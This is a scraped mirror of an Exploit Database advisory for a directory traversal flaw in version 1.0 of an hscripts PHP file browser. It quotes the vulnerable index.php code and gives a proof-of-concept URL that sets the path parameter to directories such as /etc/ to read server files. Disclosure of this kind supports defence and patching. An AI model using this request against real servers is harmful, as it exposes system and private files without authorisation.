PHP File Browser Script 1 – Directory Traversal

• Exploit Database
• 116 阅读

• 作者： AkkuS
  日期： 2018-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45327/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  # Exploit Title: PHP File Browser Script 1 - Directory Traversal # Dork: N/A # Date: 2018-09-03 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php # Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip # Version: 1.0 # Category: Webapps # Tested on: Kali linux # Description : The "index.php" is vulnerable to directory traversal. # An attacker can see and read all files known by the name   # Vulnerable File: index.php <?php // line 45   72$script = basename(__FILE__); // the name of this script 73$path = !empty($_REQUEST[&apos;path&apos;]) ? $_REQUEST[&apos;path&apos;] : "demo"; // the path the script should access 74 75if($loc!=&apos;&apos;){ 76echo "<p id=&apos;bloc&apos;><b>Browsing Location: </b><a href=&apos;https://www.exploit-db.com/exploits/45327/index.php&apos;><b>".ucfirst($loc1)."</b></a> 77<a href=&apos;https://www.exploit-db.com/exploits/45327/$script?path=$rpath/$loc1/$loc2&apos;><b>".ucfirst($locdem2)."</b></a> 78<a href=&apos;https://www.exploit-db.com/exploits/45327/&apos;><b>".ucfirst($locdem3)."</b></a></p>";} 79else{ 80echo "<p id=&apos;bloc&apos;><b>Browsing Location: </b><a href=&apos;https://www.exploit-db.com/exploits/45327/&apos;><b>Demo</b></a></p>";   ?> // line 151   # PoC :   https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]   # You can write the known directory name instead of [DirectoryName]. # Example: &apos;/etc/&apos; or &apos;/var/www/&apos; # https://Target/scripts/php/file-browser-demo/index.php?path=/etc/